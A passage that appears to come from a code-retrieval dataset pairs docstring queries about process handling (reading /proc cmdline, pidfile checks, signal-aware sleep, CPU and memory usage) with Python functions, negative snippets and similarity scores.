try:\n schema.validate(ARGUMENTS)\n except SchemaError as err:\n exit(err)", "def matches(self, pid):\n if self._command_wildcards or self._command_regexs:\n # Matchers requiring comm file\n path = P.join(PROC_DIR, str(pid), 'comm')\n try:\n with open(path) as f:\n comm = f.read().rstrip()\n for pattern in self._command_wildcards:\n if fnmatch(comm, pattern):\n return True\n\n for re_obj in self._command_regexs:\n if re_obj.match(comm):\n return True\n except FileNotFoundError:\n # process may have exited before file could be read\n return False\n\n return False", "def check_running(process, min=1):\n if j.data.platform.is_linux():\n pids = get_pids(process)\n if len(pids) >= min:\n return True\n return False", "def check_cli():\n if \"--help\" in sys.argv or \"-h\" in sys.argv:\n _exit(__help__)\n debug = False\n if \"--debug\" in sys.argv:\n debug = True\n sys.argv.remove(\"--debug\")\n input_file_names = sys.argv[1:]\n return debug, input_file_names", "def validateInput(self): \n if (self.options.mexURL and self.options.token): #run module through engine service\n return True\n \n if (self.options.user and self.options.pwd and self.options.root): #run module locally (note: to test module)\n return True\n \n log.debug('Botanicam: Insufficient options or arguments to start this module')\n return False", "def process_check_input_argument():\n\n try:\n input_argv = sys.argv[1]\n if input_argv == \"0\":\n stand_alone_flag = 0\n else:\n stand_alone_flag = 0\n except IndexError:\n stand_alone_flag = 1\n\n return stand_alone_flag", "def _check_args(self, args):\n if len(args) == 0:\n print(\"No parameters provided.\")\n return False\n else:\n return True", "def is_valid_command(args):\n if args.command is not None:\n return True\n return False", "def toolHasOptions(*args, **kwargs)->bool:\n pass", "def validateProcess(process):\n \n schedule=process.schedule_()\n paths=process.paths_()\n endpaths=process.endpaths_()\n \n # check output mods are in paths and have appropriate settings\n for outputModName in process.outputModules_().keys():\n outputMod = getattr(process, outputModName)\n if not hasattr(outputMod, 'dataset'):\n msg = \"Process contains output module without dataset PSET: %s \\n\" % outputModName\n msg += \" You need to add this PSET to this module to set dataTier and filterName\\n\"\n raise RuntimeError(msg)\n ds=getattr(outputMod,'dataset')\n if not hasattr(ds, \"dataTier\"):\n msg = \"Process contains output module without dataTier parameter: %s \\n\" % outputModName\n msg += \" You need to add an untracked parameter to the dataset PSET of this module to set dataTier\\n\"\n raise RuntimeError(msg)\n\n # check module in path or whatever (not sure of exact syntax for endpath)\n omRun=False\n\n if schedule==None:\n for path in paths:\n if outputModName in getattr(process,path).moduleNames():\n omRun=True\n for path in endpaths:\n if outputModName in getattr(process,path).moduleNames():\n omRun=True\n else:\n for path in schedule:\n if outputModName in path.moduleNames():\n omRun=True\n if omRun==False:\n msg = \"Output Module %s not in endPath\" % outputModName\n raise RuntimeError(msg)", "def _check_valid_command_argument(valid_list, args):\n if args in valid_list:\n return 0\n else:\n return -1", "def cmd_has_option(self, executable, search_option, arg=None):\n if not executable:\n return False\n arg_list = []\n if arg and is_genstr(arg):\n arg_list = [arg]\n elif isinstance(arg, list):\n arg_list = arg\n out = Uprocess().get_output([executable] + arg_list + [\"--help\"])\n if out 
and search_option in re.split(r\"[=|\\*\\[\\]\\n,; ]+\", out):\n return True\n return False", "def test_cli_boolean_args(\n config,\n):\n args = CLI.parse_args([\"--version\"])\n assert args.version is True\n\n args = CLI.parse_args([\"--test\"])\n assert args.test is True\n\n args = CLI.parse_args([\"--print-config-file\"])\n assert args.print_config_file is True\n\n args = CLI.parse_args([\"-T\"])\n assert args.check_login is True", "def test_process_path(path):\n try:\n subprocess.call([path, \"--version\"])\n return True\n except:\n print(\"Cannot find executable on {}\".format(path))\n return False", "def check_argv():\n parser = argparse.ArgumentParser(description=__doc__.strip().split(\"\\n\")[0], add_help=False)\n parser.add_argument(\"segment_fn\", type=str, help=\"pickled segmentation file\")\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n return parser.parse_args()", "def has_required_programs(program_list):\n \n returnValue = True\n \n for program in program_list:\n if commands.getstatusoutput(\"which \"+program)[0] != 0:\n log.error(program+\" is required by \"+PROGRAM_NAME)\n returnValue = False\n \n return returnValue", "def check_argv():\n parser = argparse.ArgumentParser(description=__doc__.strip().split(\"\\n\")[0], add_help=False)\n parser.add_argument(\"keywordslist\", help=\"Numpy output file\")\n parser.add_argument(\"dirs\", help=\"Numpy output file\")\n parser.add_argument(\"npz_train\", help=\"Numpy output file\")\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n return parser.parse_args()", "def check_args(args):\n for arg in vars(args):\n if getattr(args, arg):\n return True\n return False" ]
[ "0.65596586", "0.6360689", "0.6212573", "0.61894363", "0.6104708", "0.6048994", "0.6045347", "0.5974168", "0.59560287", "0.58320457", "0.5827571", "0.5820868", "0.5817725", "0.58135414", "0.57502115", "0.5743185", "0.5727226", "0.56809455", "0.5666836", "0.56435555", "0.563625", "0.56149787", "0.5612502", "0.5513502", "0.5508815", "0.55057263", "0.5491771", "0.54863214", "0.54773945", "0.54729164" ]
0.7529902
0
Reads the commandline arguments for the specified pid and returns the contents.
def __read_command_line(self, pid): pf = None try: pf = file('/proc/%d/cmdline' % pid, 'r') return pf.read().strip() finally: if pf is not None: pf.close()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def ReadArguments():\n\n args = ParseArguments()\n\n logging.info('Command line arguments...')\n for arg in vars(args):\n logging.info(str(arg) + ': ' + str(getattr(args, arg)))\n logging.info('')\n\n IsTest(args)\n ProcessCacheSize(args)\n ProcessLineSize(args)\n ProcessMulti(args)\n ProcessMemPattern(args)\n ProcessMemFile(args)", "def get_pid_full_cmdline_as_array(pid):\n try:\n f = open(\"/proc/%i/cmdline\" % pid,'r')\n except IOError:\n raise Exception(\"Could not open /proc/%i/cmdline, does not exist\" % pid);\n try:\n tmp = f.read()\n f.close()\n except IOError, ex:\n print ex\n raise Exception(\"Could not read from process cmdline\");\n assert tmp[-1] == '\\x00'\n return tmp[:-1].split(\"\\x00\")", "def process_command_line_arguments() -> Namespace:\n\n parser = build_parser()\n arguments = parser.parse_args()\n\n return arguments", "def get_args(args):\n parser = parse_arguments()\n return parser.parse_args(args)", "def get_backup_args(pid):\n cmd = [\"ps\", \"-p\", str(pid), \"-o\", \"args\", \"h\"]\n rc, output, err = run_cmd_output(cmd)\n if rc == 0:\n # The rc file should be the first argument after the command\n (_, all_args) = output.split(\"enbackup backup\")\n args = all_args.strip().split()[0]\n else:\n args = \"<Cannot find args for PID {}\".format(pid)\n return args", "def contentsOfFileSpecifiedIn(argv):\n for argument in argv:\n try:\n with open(argument) as testFile:\n return testFile.readlines()\n except EnvironmentError:\n pass # Expect many to not be files.\n \n # No file specified, try stdin\n try:\n if not stdin.isatty():\n return stdin.readlines() # Read, but only from non-interactive stdin\n except EnvironmentError:\n pass # Give up.\n return None", "def get_args():\n\n parser = get_argument_parser()\n args = parser.parse_args()\n\n return args", "def get_args_from_command_line():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_csv_path\", type=str)\n parser.add_argument(\"--text_column_order\", type=int)\n args = parser.parse_args()\n return args", "def _read_cmd_args():\n\n # Check if argument count is correct.\n if len(sys.argv) != 5:\n print(\"[ERR] Invalid number of command line arguments!\")\n _usage()\n sys.exit(1)\n\n # Get path to config file\n configfile = sys.argv[1]\n if not os.path.exists(configfile):\n print(f\"[ERR] Config file {configfile} does not exist!\")\n sys.exit(1)\n\n # Get top directory of LIS data\n topdatadir = sys.argv[2]\n if not os.path.exists(topdatadir):\n print(f\"[ERR] LIS data directory {topdatadir} does not exist!\")\n sys.exit(1)\n\n # Get valid year and month\n yyyymm = sys.argv[3]\n if len(yyyymm) != 6:\n print(\"[ERR] Invalid length of YYYYMM, must be 6 characters!\")\n sys.exit(1)\n year = int(yyyymm[0:4])\n month = int(yyyymm[4:6])\n try:\n startdate = datetime.datetime(year, month, day=1)\n except ValueError:\n print(\"[ERR] Invalid YYYYMM passed to script!\")\n sys.exit(1)\n\n # Get model forcing ID\n model_forcing = sys.argv[4]\n\n return configfile, topdatadir, startdate, model_forcing", "def read(*args):\n return io.open(os.path.join(HERE, *args), encoding=\"utf-8\").read()", "def get_args():\n if len(sys.argv) == 3:\n return sys.argv[1:]\n print(\"USAGE: python3 extract_cds.py infile outfile\\n\\n\")\n exit()", "def _argsForSubprocess(self) -> list[str]:\n pass", "def _read_cmd_args():\n\n # Check if argument count is correct.\n if len(sys.argv) != 4:\n print(\"[ERR] Invalid number of command line arguments!\")\n print(len(sys.argv))\n print(sys.argv[:])\n _usage()\n sys.exit(1)\n\n # 
Check if lis.config template exists.\n lis_config_template = sys.argv[1]\n if not os.path.exists(lis_config_template):\n print(f\"[ERR] {lis_config_template} does not exist!\")\n sys.exit(1)\n\n # Check if directory for restart files exists. Actual restart file\n # shall be checked later.\n restart_dir = sys.argv[2]\n if not os.path.exists(restart_dir):\n print(f\"[ERR] Directory {restart_dir} does not exist!\")\n sys.exit(1)\n\n # Get start date of new LIS run.\n yyyymmdd = sys.argv[3]\n if len(yyyymmdd) != 8:\n print(\"[ERR] Invalid length for YYYYMMDD, must be 8 characters!\")\n sys.exit(1)\n year = int(yyyymmdd[0:4])\n month = int(yyyymmdd[4:6])\n day = int(yyyymmdd[6:8])\n try:\n startdate = datetime.date(year, month, day)\n except ValueError:\n print(\"[ERR] Invalid YYYYMMDD passed to script!\")\n sys.exit(1)\n\n return lis_config_template, restart_dir, startdate", "def parse_command_line():\n parser = argparse.ArgumentParser(description='Parses ID\\'s from the DDI compendium search results, and then downloads the html and puts them into a sqlite database.')\n parser.add_argument('-f', '--file', dest='file',\n action='store',\n help='Filenname to be read')\n arg_manager = parser.parse_args()\n return arg_manager", "def read_sockeye_args(params_path):\n with open(params_path) as f:\n content = f.readlines()\n\n res = []\n for line in content:\n res += line.split()\n return res", "def readArgs():\n parser = argparse.ArgumentParser(description=\n \"\"\"Debug script. This program is used in order to generate a summary\n statistics for the csv files generated by the annotation_parser. Things\n like the average amount of overlap of each window and the average deviation.\n \"\"\")\n\n parser.add_argument('-f', '--csv-dir', metavar='',\n dest='csv_dir',\n action='store', default=os.path.dirname(os.path.abspath(__file__)),\n help='Specify the csv directory.')\n parser.add_argument('-d', '--deviation', metavar='',\n dest='deviation', action='store',\n default=50,\n help='percentage set point from which evaluate the deviation from.')\n\n return parser.parse_args()", "def parse_cmdline():\n\tparser = ArgumentParser(prog=\"FastP_QC.py\", description=\"\"\"Script collects stats from fastp jsons.\"\"\")\n\tparser.add_argument(\"-r1\", \"--r1_stats\", dest=\"r1_stats\", action=\"store\", required=True, help=\"Text file with r1 stats, from q30.py script.\")\n\tparser.add_argument(\"-r2\", \"--r2_stats\", dest=\"r2_stats\", action=\"store\", required=True, help=\"Text file with r2 stats, from q30.py script.\")\n\tparser.add_argument(\"-n\", \"--name\", dest=\"name\", action=\"store\", required=True, help=\"Sample name\")\n\targs = parser.parse_args()\n\treturn args", "def process_command_line_input():\n\n input_args = sys.argv\n if input_args[0].find('ipython') >= 0:\n input_args = list()\n else:\n input_args.pop(0)\n\n return input_args", "def read_cli_args(argv):\n\n # Working defaults\n cur_dir = os.getcwd()\n config_file = os.path.normpath(os.path.join(cur_dir, \"config.yaml\"))\n override_file = os.path.normpath(os.path.join(cur_dir, \"overrides.yaml\"))\n merged_file = os.path.normpath(os.path.join(cur_dir, \"build\", \"config.yaml\"))\n # Parse the args\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config-file',\n action='store', type=str, dest=\"config_file\",\n help='Path to Config file to read. 
Default:'\n + config_file,\n default=config_file)\n parser.add_argument('-o', '--override-file',\n action='store', type=str, dest=\"override_file\",\n help='Path to override file. Default:'\n + override_file,\n default=override_file)\n parser.add_argument('-m', '--merged-file',\n action='store', type=str, dest=\"merged_file\",\n help='Path to output of this script. Default:'\n + merged_file,\n default=merged_file)\n args = parser.parse_args()\n return args", "def extract_arguments(f: TextIO) -> List[str]:\n args = []\n for line in f.readlines():\n idx = line.find(\"#\")\n if idx != -1:\n line = line[:idx]\n\n args.extend(shlex.split(line))\n return args", "def get_args():\n parser = build_arg_parser()\n\n args = parser.parse_args()\n\n return prompt_for_password(args)", "def get_args():\n parser = argparse.ArgumentParser(\n description='Some Basic Spark Job doing some stuff on IMDb data stored within HDFS.')\n return parser.parse_args()", "def get_cli_arguments(self):\n pass", "def retrieve_args_dict():\n process_args = sys.argv[1:]\n dictionary = dict()\n for process_arg in process_args:\n splitted = process_arg.split(\":\")\n if len(splitted) > 1:\n key = splitted[0]\n value = \"\".join(splitted[1:])\n dictionary[key] = value\n return dictionary", "def Get_Arguments():\n parser = argparse.ArgumentParser(description=\"Adds batch, species, subspecies \"\n \"columns to popmap file for summarizing ExDFOIL output\",\n add_help=False)\n\n required_args = parser.add_argument_group(\"Required Arguments\")\n optional_args = parser.add_argument_group(\"Optional Arguments\")\n\n ## Required Arguments\n required_args.add_argument(\"-p\", \"--popmap\",\n type=str,\n required=True,\n help=\"String; Tab-separated popmap file: indID\\tpopID\")\n\n ## Optional Arguments\n optional_args.add_argument(\"-b\", \"--batch\",\n type=str,\n required=False,\n default=None,\n nargs=\"?\",\n help=\"Filename containing batchIDs\")\n optional_args.add_argument(\"-S\", \"--species\",\n type=str,\n required=False,\n default=None,\n nargs=\"?\",\n help=\"Filename containing speciesIDs\")\n optional_args.add_argument(\"-s\", \"--subspecies\",\n type=str,\n required=False,\n default=None,\n nargs=\"?\",\n help=\"Filename containing subspeciesIDs\")\n optional_args.add_argument(\"-o\", \"--outfile\",\n type=str,\n required=False,\n default=\"mysampleinfo.txt\",\n nargs=\"?\",\n help=\"Specify output filename; default=mysampleinfo.txt\")\n optional_args.add_argument(\"-h\", \"--help\",\n action=\"help\",\n help=\"Displays this help menu\")\n\n\n args = parser.parse_args()\n\n return args", "def get_cmd_args():\n\n\n\t#Creates the Argument Parser\n\tparser = ArgumentParser(description = \"ID Lab qPCR Analysis v\" + VERSION + \" \" + QUALITY)\n\n\t#Adds the input file argument\n\tparser.add_argument('-f', '--file',\n\t\t\t\tnargs = '+',\n\t\t\t\ttype = FileType('r'),\n\t\t\t\trequired = True)\n\n\t#Adds the output directory\n\tparser.add_argument('-o', '--output',\n\t\t\t\trequired = True)\n\n\t#Adds the model argument, to select between the three models\n\tparser.add_argument('-m', '--mod', '--model',\n\t\t\t\tnargs = '?',\n\t\t\t\tchoices = ['relative', 'absolute', 'stability'],\n\t\t\t\trequired = True)\n\n\t#Adds the control genes argument, taking a list of gene names\n\tparser.add_argument('-cg', '--cgenes', '--controlgenes',\n\t\t\t\tnargs = '+',\n\t\t\t\trequired = True)\n\n\t#Adds the optional control sample argument for the stability model, taking a list of sample names\n\tparser.add_argument('-cs', '--csample', 
'--controlsamples',\n\t\t\t\tnargs = '*')\n\n\t#Adds optional outlier cutoff\n\tparser.add_argument('-oc', '--ocutoff',\n\t\t\t\ttype = float,\n\t\t\t\tdefault = 0.3)\n\n\t#Adds optional max outliers\n\tparser.add_argument('-om', '--omax',\n\t\t\t\ttype = float,\n\t\t\t\tdefault = 0.5)\n\n\t#Adds optional encoding \n\tparser.add_argument('-e', '--encoding',\n\t\t\t\tdefault = 'ISO-8859-1')\n\n\t#Adds optional header size\n\tparser.add_argument('-hd', '--header',\n\t\t\t\tdefault = 47)\n\n\treturn vars(parser.parse_args())", "def get_args(self):\n args = self._parser.parse_args()\n return self._prompt_for_password(args)", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"\"\"\n Yield a sorted frequency count of similar/dissimilar InChi DW/OpenBabel.\n\"\"\")\n\n parser.add_argument(\n \"file\",\n help=\"DataWarrior's list file exported after running the macro.\")\n args = parser.parse_args()\n\n data = args.file\n return data", "def command_line_arguments():\n\n try:\n parser = argparse.ArgumentParser(description='Log Handler/Cleaner/Copier for Idemia DocAuth')\n\n # Add required arguments.\n parser.add_argument('action', choices=['clean', 'download'], type=str, help='clean or download')\n\n # Parse the arguments\n args = parser.parse_args()\n\n return args\n\n except Exception as err:\n print(err)\n return", "def parse_args(self, argv=None):\n self.opts, self.args = self.cli_parser.parse_args(argv)\n self._begin_logging()\n if argv is None:\n argv = sys.argv\n logger.info(' '.join(argv))\n self._process_input_files()\n self._construct_links_of_interest()\n self._open_output_files()\n data = self._construct_data_struct()\n return data" ]
[ "0.65537363", "0.6036514", "0.5997907", "0.5957874", "0.5922425", "0.5763637", "0.57568336", "0.57552546", "0.57092315", "0.5705053", "0.56773204", "0.5660786", "0.56368196", "0.5633759", "0.56327707", "0.56173635", "0.5616477", "0.55958754", "0.5568026", "0.55643076", "0.5560166", "0.55585086", "0.5553483", "0.55095285", "0.55087584", "0.5487276", "0.5478973", "0.5474008", "0.54658204", "0.54509413" ]
0.6990076
0
Exit the process with a nonzero status if the agent is already running.
def fail_if_already_running(self): pid = self.__read_pidfile() if pid: message = "The agent appears to be running pid=%d. pidfile %s does exist.\n" sys.stderr.write(message % (pid, self.pidfile)) sys.exit(1)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def processEnded(self, status):\r\n self.pid = None\r\n statusMap = {\r\n 0: ProcessDone,\r\n 1: ProcessTerminated,\r\n }\r\n self.proto.processEnded(Failure(statusMap[status](status)))", "def exit(status=None): # real signature unknown; restored from __doc__\n pass", "def exit(self, status=0):\n if self.logger:\n self.logger.debug(\"Beginning exit and cleanup.\")\n else:\n print \"Warning: Exiting, but logger has not been initialized.\"\n\n if self._lockfilename:\n AppHandler.remove_lock(self._lockfilename)\n\n gid = grp.getgrnam(self.groupowner)[2]\n\n # Check to make sure current process is in correct group\n allgroups = os.getgroups()\n if not gid in allgroups:\n self.logger.warning(\"Current process is not in the proper group ({0}).\".format(gid))\n\n # Make sure the log file ends up with the right group owner:\n if self._logfile:\n if os.stat(self._logfile)[5] != gid:\n os.chown(self._logfile, -1, gid)\n sys.exit(status)", "def process_exists(self, pid):\n try:\n os.kill(pid, 0)\n except OSError:\n return False\n return True", "def check_finish(self):\r\n return not self.proc.is_alive()", "def abort(self):\n\n if self.process:\n self.process.kill()\n return True\n else:\n return False", "def abort(self):\n if self.process:\n self.process.kill()\n return True\n else:\n return False", "def sanity_check_process(self):\n assert_equals(self.proc.returncode, None)\n time.sleep(1)", "def check_process_status(self, popenObj):\n if not isinstance(popenObj, subprocess.Popen):\n self.logger.error(\n \"Cannot terminate a process since the arg is not Popen object.\")\n return False, -1\n\n popenObj.poll()\n retcode = popenObj.returncode\n\n if retcode is None:\n return self.PROCESSSTATE_ALIVE\n return self.PROCESSSTATE_DEAD", "def _accept_exit_status(self, exit_status):\r\n return exit_status == 0", "def _accept_exit_status(self, exit_status):\r\n return exit_status == 0", "def do_exit(_arg=None):\n return True", "def kill_if_running(self):\n if self.process and self.process.state() == QProcess.Running:\n self.process.kill()", "def returncode(self):\n if self._returncode is None:\n raise RuntimeError('App process is still running')\n return self._returncode", "def end_script(status):\n if status is not 0:\n print(\"Failure occurred: \" + str(status))\n sys.exit(status)", "def do_exit(self, args):\n return sys.exit(1)", "def _is_alive(self) -> bool:\n\n if self._on:\n return True\n\n try:\n os.kill(self.proc.pid, 0)\n except (OSError, ProcessLookupError):\n return False\n\n return True", "def test_use_exit_status(self): # suppress(no-self-use)\n subprocess.call.return_value = 1\n GreenTestCommand(Distribution()).run()\n sys.exit.assert_called_with(1)", "def _exit_with_return(self) -> int:\n self.should_exit = True\n return 0", "def get_status(self) -> bool:\n try:\n self.__driver.service.assert_process_still_running()\n return True\n except AttributeError:\n return False", "def alive(self, pid):\n try:\n self.ssh(\"kill -0 %s\" % str(pid), allow_fail=False)\n return True\n except:\n return False", "def _accept_exit_status(self, exit_status):\r\n if exit_status != 0:\r\n return False\r\n return True", "def __procFinished(self, exitCode, exitStatus):\n self.__finish()", "def do_exit(self,*args):\r\n return True", "def exit(self):\n if self._isSubProcessRunning() and self._exitCommand is not None:\n self.__process.stdin.write(self._exitCommand)\n self.__process.stdin.write(os.linesep)\n self.__process.stdin.flush()\n time.sleep(0.5)\n \n if self._isSubProcessRunning() :\n self.__process.kill()\n 
time.sleep(0.1)\n print 'Done!'", "def test_stopProcessAlreadyStopped(self):\r\n self.pm.addProcess(\"foo\", [\"foo\"])\r\n self.assertIdentical(None, self.pm.stopProcess(\"foo\"))", "def wait_process_running(process):\n assert process.is_running()", "def status(self):\n # process running ?\n pid = self.get_pidfile()\n \n running = True\n \n # process is not running\n if pid is None:\n running = False\n else:\n if not self.send_signal(pid,0):\n running = False\n # abnormal state, delete the file\n self.delete_pidfile()\n \n if running:\n message = \"server is running\\n\"\n else:\n message = \"server is not running\\n\"\n sys.stdout.write(message)\n \n return running", "def finish(self, pid, sts):\r\n self.drain()\r\n\r\n es, msg = decode_wait_status(sts)\r\n\r\n now = time.time()\r\n self.laststop = now\r\n processname = self.config.name\r\n\r\n tooquickly = now - self.laststart < self.config.startsecs\r\n exit_expected = es in self.config.exitcodes\r\n\r\n if self.killing:\r\n # likely the result of a stop request\r\n # implies STOPPING -> STOPPED\r\n self.killing = 0\r\n self.delay = 0\r\n self.exitstatus = es\r\n\r\n msg = \"stopped: %s (%s)\" % (processname, msg)\r\n self._assertInState(ProcessStates.STOPPING)\r\n self.change_state(ProcessStates.STOPPED)\r\n\r\n elif tooquickly:\r\n # the program did not stay up long enough to make it to RUNNING\r\n # implies STARTING -> BACKOFF\r\n self.exitstatus = None\r\n self.spawnerr = 'Exited too quickly (process log may have details)'\r\n msg = \"exited: %s (%s)\" % (processname, msg + \"; not expected\")\r\n self._assertInState(ProcessStates.STARTING)\r\n self.change_state(ProcessStates.BACKOFF)\r\n\r\n else:\r\n # this finish was not the result of a stop request, the\r\n # program was in the RUNNING state but exited implies\r\n # RUNNING -> EXITED\r\n self.delay = 0\r\n self.backoff = 0\r\n self.exitstatus = es\r\n\r\n if self.state == ProcessStates.STARTING:\r\n # XXX I don't know under which circumstances this\r\n # happens, but in the wild, there is a transition that\r\n # subverts the RUNNING state (directly from STARTING\r\n # to EXITED), so we perform the correct transition\r\n # here.\r\n self.change_state(ProcessStates.RUNNING)\r\n\r\n self._assertInState(ProcessStates.RUNNING)\r\n\r\n if exit_expected:\r\n # expected exit code\r\n msg = \"exited: %s (%s)\" % (processname, msg + \"; expected\")\r\n self.change_state(ProcessStates.EXITED, expected=True)\r\n else:\r\n # unexpected exit code\r\n self.spawnerr = 'Bad exit code %s' % es\r\n msg = \"exited: %s (%s)\" % (processname, msg + \"; not expected\")\r\n self.change_state(ProcessStates.EXITED, expected=False)\r\n\r\n self.config.options.logger.info(msg)\r\n\r\n self.pid = 0\r\n self.config.options.close_parent_pipes(self.pipes)\r\n self.pipes = {}\r\n self.dispatchers = {}\r\n\r\n # if we died before we processed the current event (only happens\r\n # if we're an event listener), notify the event system that this\r\n # event was rejected so it can be processed again.\r\n if self.event is not None:\r\n # Note: this should only be true if we were in the BUSY\r\n # state when finish() was called.\r\n events.notify(events.EventRejectedEvent(self, self.event))\r\n self.event = None", "def exit_status(self):\n return self._exit_status" ]
[ "0.6195423", "0.6041457", "0.60360324", "0.59795636", "0.5978203", "0.59733963", "0.59637934", "0.5955729", "0.59308636", "0.5870076", "0.5870076", "0.58643895", "0.5832923", "0.5810707", "0.5802401", "0.579938", "0.57855886", "0.5770318", "0.5765552", "0.5759777", "0.5756108", "0.5749182", "0.5748616", "0.57373226", "0.5718921", "0.5711446", "0.57094246", "0.5695478", "0.5690299", "0.56885445" ]
0.66552776
0
Sleeps for at most the specified number of seconds while also handling signals. Python does not do a great job of handling signals quickly when you invoke the normal time.sleep(). This method is a Unix-specific implementation of a sleep that should do a better job of quickly handling signals while sleeping. This method may return earlier than the requested number of seconds if a signal is received.
def sleep(self, seconds): # We schedule an alarm signal for x=seconds out in the future. # noinspection PyUnusedLocal def handle_alarm(signal_num, frame): pass signal.signal(signal.SIGALRM, handle_alarm) signal.alarm(seconds) # Wait for either the alarm to go off or for us to receive a SIGINT. signal.pause() # Remove the alarm if it is still pending. signal.alarm(0)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def sleep(self, seconds):\n ten_ms_steps = int(round(seconds * 100))\n for _i in xrange(0,ten_ms_steps):\n if self._sequence_stop_signal:\n break\n sleep(0.01)", "def sleep(seconds):\n\n # Check seconds to ensure it is a valid type.\n if type(seconds) not in [long, float, int]:\n raise RepyArgumentError(\"Invalid type \" + str(type(seconds)))\n\n # Using getruntime() in lieu of time.time() because we want elapsed time \n # regardless of the oddities of NTP\n start = nonportable.getruntime()\n sleeptime = seconds\n\n # Return no earlier than the finish time\n finish = start + seconds\n\n while sleeptime > 0.0:\n time.sleep(sleeptime)\n\n # If sleeptime > 0.0 then I woke up early...\n sleeptime = finish - nonportable.getruntime()", "def sleep(seconds):\n\n return Sleep(seconds)", "def sleep(seconds):\n # After load and initializing the PvAPI Python's built-in 'sleep' function\n # stops working (returns too early). The is a replacement.\n from time import sleep,time\n t = t0 = time()\n while t < t0+seconds: sleep(t0+seconds - t); t = time()", "def _sleep(self, sleep_time: float = 10) -> None:\n sleep_until_interrupt(sleep_time, lambda: self.stopped, interval=0.5)", "def sleep(seconds):\r\n time.sleep(seconds)", "def sleep(seconds):\n time.sleep(seconds)", "def sleep(seconds):\n time.sleep(seconds)", "def sleep(sleep_time=0.250):\n time.sleep(sleep_time)", "def sleep(secs=1.0):\n time.sleep(secs)", "def sleep(min_seconds=1, max_seconds=10):\n time.sleep(randint(min_seconds, max_seconds))", "def sleep(seconds: typing.Union[float, int]):\n if seconds == 0:\n yield\n elif seconds == inf:\n yield from sleepinf()\n else:\n end = monotonic() + seconds\n while end >= monotonic():\n yield", "async def sleep(self, seconds):\n await self._sleep_until_nanos(_get_future_nanos(seconds))", "def sleep(self, seconds=60):\n\t\ttime.sleep(seconds)", "def sleep_for(timeToSleep):\r\n time.sleep(timeToSleep)", "def sleep(self, seconds):\n time.sleep(seconds)", "async def _sleep(self, sleep_time: float = 10) -> None:\n async def _interrupt() -> bool:\n return self.stopped\n await async_sleep_until_interrupt(sleep_time, _interrupt, interval=0.5)", "def pulse(seconds):\n index = 0\n while index < len(fake_threads):\n t = fake_threads[index]\n t['sleep'] -= seconds\n if t['sleep'] <= 0:\n t['sleep'] = 0\n t['next_sleep_time'] = None\n t['greenlet'].run()\n sleep_time = t['next_sleep_time']\n if sleep_time is None or isinstance(sleep_time, tuple):\n del fake_threads[index]\n index -= 1\n else:\n t['sleep'] = sleep_time\n index += 1", "def Sleep(desired_sleep):\n actual_sleep = 0\n while True:\n sleep_length = desired_sleep - actual_sleep\n start_time = int(time.time())\n Log('Sleep: Sleeping for %s seconds' % sleep_length)\n time.sleep(sleep_length)\n this_sleep = int(time.time()) - start_time\n Log('Sleep: Actually slept for %s seconds' % actual_sleep)\n if this_sleep < 0:\n Log('Sleep: Error, this_sleep was %d (less than zero)' % actual_sleep)\n break\n actual_sleep += this_sleep\n if actual_sleep >= desired_sleep:\n Log('Sleep: Finished sleeping, returning' % actual_sleep)\n break\n Log('Sleep: Awoke too early, sleeping again')", "def sleep(self, amount: float):\n time.sleep(amount)", "def thread_sleep(seconds, event):\n for i in range(seconds):\n if event and event.is_set():\n return 1\n sleep(1)\n return 0", "def sleep(interval):\n time.sleep(interval) # pragma: no cover", "def wait_for_seconds(self, seconds, sleeptime=0.001):\n self.listen_until_return(timeout=seconds, sleeptime=sleeptime)", "def 
delay(seconds):\n\n # Perform the delay\n time.sleep(seconds)", "def wake_till(seconds):\n while True:\n if int(time.time()) < seconds:\n time.sleep(5)\n else:\n return", "def _sleep(self):\n while 1:\n diff = (time.time()-self.lastcall) - self.mindelay\n if diff >= 0: return\n time.sleep(max(-diff/2.0, 0.01))", "def sleep_after(self, seconds):\n if self._firmware >= 264:\n self.write(self.ASCII_ESC, '8', seconds, seconds >> 8)\n else:\n self.write(self.ASCII_ESC, '8', seconds)", "def sleep_approx(self, seconds):\n upperbound = (seconds+0.2)*10000\n if (seconds >= 1):\n lowerbound = (seconds-0.2)*10000\n else:\n lowerbound = seconds*10000\n\n sleeptime = random.randint(lowerbound, upperbound)\n sleeptime = sleeptime/10000\n sleeptime = sleeptime*.8\n\n if (self.botspeed == 1.25):\n sleeptime = sleeptime*.75\n elif (self.botspeed == 1.5):\n sleeptime = sleeptime*.5\n sleep(sleeptime)", "def sleep(self):\n if self._stop is not None:\n timeLeft = max(self._stop - time.time(), 0) \n sleep = min(self._sleep, timeLeft)\n else:\n sleep = self._sleep\n time.sleep(sleep)", "def sleep(self):\n self.sleep_after(1) # Can't be 0, that means 'don't sleep'" ]
[ "0.70630014", "0.7060907", "0.7036341", "0.69794136", "0.6970344", "0.696298", "0.6951769", "0.6951769", "0.69417673", "0.67783153", "0.67622095", "0.66984147", "0.66940546", "0.662884", "0.6621498", "0.6614137", "0.64386445", "0.6405465", "0.6392214", "0.63817585", "0.62740105", "0.6261619", "0.6246918", "0.6240803", "0.620743", "0.6200762", "0.61901", "0.61846226", "0.613975", "0.6138885" ]
0.7286979
0
Returns CPU and memory usage information. It returns the results in a tuple: the first element is the number of CPU seconds spent in user land, the second is the number of CPU seconds spent in system land, and the third is the current resident size of the process in bytes.
def get_usage_info(self): usage_info = resource.getrusage(resource.RUSAGE_SELF) user_cpu = usage_info[0] system_cpu = usage_info[1] rss_size = usage_info[2] return user_cpu, system_cpu, rss_size
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
